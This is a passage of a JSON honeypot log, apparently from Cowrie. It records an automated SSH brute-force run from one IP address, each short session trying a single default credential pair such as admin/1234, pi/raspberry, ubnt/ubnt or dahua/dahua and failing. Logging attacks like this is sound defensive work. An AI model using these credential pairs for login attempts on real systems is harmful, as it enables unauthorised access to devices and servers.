0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:28.159206Z","src_ip":"212.227.235.229","session":"62043164fdef"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:29.602948Z","src_ip":"212.227.235.229","session":"62043164fdef"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:31.012532Z","src_ip":"212.227.235.229","session":"62043164fdef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33700,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea6aea50d49f","protocol":"ssh","message":"New connection: 212.227.235.229:33700 (1.2.3.4:22) [session: ea6aea50d49f]","sensor":"my-vps","timestamp":"2025-08-28T23:22:31.114522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:31.325257Z","src_ip":"212.227.235.229","session":"ea6aea50d49f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:31.326725Z","src_ip":"212.227.235.229","session":"ea6aea50d49f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"111111","message":"login attempt [admin/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:32.702779Z","src_ip":"212.227.235.229","session":"ea6aea50d49f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:33.839242Z","src_ip":"212.227.235.229","session":"ea6aea50d49f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50876,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a1d9ce3d966","protocol":"ssh","message":"New connection: 212.227.235.229:50876 (1.2.3.4:22) [session: 6a1d9ce3d966]","sensor":"my-vps","timestamp":"2025-08-28T23:22:33.931331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:33.983990Z","src_ip":"212.227.235.229","session":"6a1d9ce3d966"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:34.043098Z","src_ip":"212.227.235.229","session":"6a1d9ce3d966"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:34.509065Z","src_ip":"212.227.235.229","session":"6a1d9ce3d966"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:35.687864Z","src_ip":"212.227.235.229","session":"6a1d9ce3d966"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35568,"dst_ip":"1.2.3.4","dst_port":22,"session":"41580ef00117","protocol":"ssh","message":"New connection: 212.227.235.229:35568 (1.2.3.4:22) [session: 41580ef00117]","sensor":"my-vps","timestamp":"2025-08-28T23:22:35.785725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:35.874011Z","src_ip":"212.227.235.229","session":"41580ef00117"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:36.025610Z","src_ip":"212.227.235.229","session":"41580ef00117"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:36.671206Z","src_ip":"212.227.235.229","session":"41580ef00117"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:37.940811Z","src_ip":"212.227.235.229","session":"41580ef00117"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49338,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c39e558b6a3","protocol":"ssh","message":"New connection: 212.227.235.229:49338 (1.2.3.4:22) [session: 8c39e558b6a3]","sensor":"my-vps","timestamp":"2025-08-28T23:22:38.058351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:38.154740Z","src_ip":"212.227.235.229","session":"8c39e558b6a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:38.155457Z","src_ip":"212.227.235.229","session":"8c39e558b6a3"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:39.165791Z","src_ip":"212.227.235.229","session":"8c39e558b6a3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:40.349015Z","src_ip":"212.227.235.229","session":"8c39e558b6a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34326,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ba4274399be","protocol":"ssh","message":"New connection: 212.227.235.229:34326 (1.2.3.4:22) [session: 8ba4274399be]","sensor":"my-vps","timestamp":"2025-08-28T23:22:40.448420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:40.543818Z","src_ip":"212.227.235.229","session":"8ba4274399be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:40.544747Z","src_ip":"212.227.235.229","session":"8ba4274399be"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:41.436141Z","src_ip":"212.227.235.229","session":"8ba4274399be"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:42.678109Z","src_ip":"212.227.235.229","session":"8ba4274399be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43934,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d7adde515a1","protocol":"ssh","message":"New connection: 212.227.235.229:43934 (1.2.3.4:22) [session: 7d7adde515a1]","sensor":"my-vps","timestamp":"2025-08-28T23:22:42.815574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:43.035944Z","src_ip":"212.227.235.229","session":"7d7adde515a1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:43.037063Z","src_ip":"212.227.235.229","session":"7d7adde515a1"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:43.968696Z","src_ip":"212.227.235.229","session":"7d7adde515a1"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:45.235682Z","src_ip":"212.227.235.229","session":"7d7adde515a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59310,"dst_ip":"1.2.3.4","dst_port":22,"session":"349c22bf4efe","protocol":"ssh","message":"New connection: 212.227.235.229:59310 (1.2.3.4:22) [session: 349c22bf4efe]","sensor":"my-vps","timestamp":"2025-08-28T23:22:45.388170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:45.581141Z","src_ip":"212.227.235.229","session":"349c22bf4efe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:45.581834Z","src_ip":"212.227.235.229","session":"349c22bf4efe"}
{"eventid":"cowrie.login.failed","username":"dahua","password":"dahua","message":"login attempt [dahua/dahua] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:46.841849Z","src_ip":"212.227.235.229","session":"349c22bf4efe"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:48.366493Z","src_ip":"212.227.235.229","session":"349c22bf4efe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45278,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba77497d92e5","protocol":"ssh","message":"New connection: 212.227.235.229:45278 (1.2.3.4:22) [session: ba77497d92e5]","sensor":"my-vps","timestamp":"2025-08-28T23:22:48.471789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:48.727884Z","src_ip":"212.227.235.229","session":"ba77497d92e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:48.728817Z","src_ip":"212.227.235.229","session":"ba77497d92e5"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456","message":"login attempt [administrator/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:51.288348Z","src_ip":"212.227.235.229","session":"ba77497d92e5"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:52.472305Z","src_ip":"212.227.235.229","session":"ba77497d92e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60692,"dst_ip":"1.2.3.4","dst_port":22,"session":"6efca3bed336","protocol":"ssh","message":"New connection: 212.227.235.229:60692 (1.2.3.4:22) [session: 6efca3bed336]","sensor":"my-vps","timestamp":"2025-08-28T23:22:52.582404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:52.704621Z","src_ip":"212.227.235.229","session":"6efca3bed336"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:52.705743Z","src_ip":"212.227.235.229","session":"6efca3bed336"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"admin","message":"login attempt [administrator/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:54.102527Z","src_ip":"212.227.235.229","session":"6efca3bed336"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:55.479709Z","src_ip":"212.227.235.229","session":"6efca3bed336"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45308,"dst_ip":"1.2.3.4","dst_port":22,"session":"20695fb3a95f","protocol":"ssh","message":"New connection: 212.227.235.229:45308 (1.2.3.4:22) [session: 20695fb3a95f]","sensor":"my-vps","timestamp":"2025-08-28T23:22:55.576184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:55.748696Z","src_ip":"212.227.235.229","session":"20695fb3a95f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message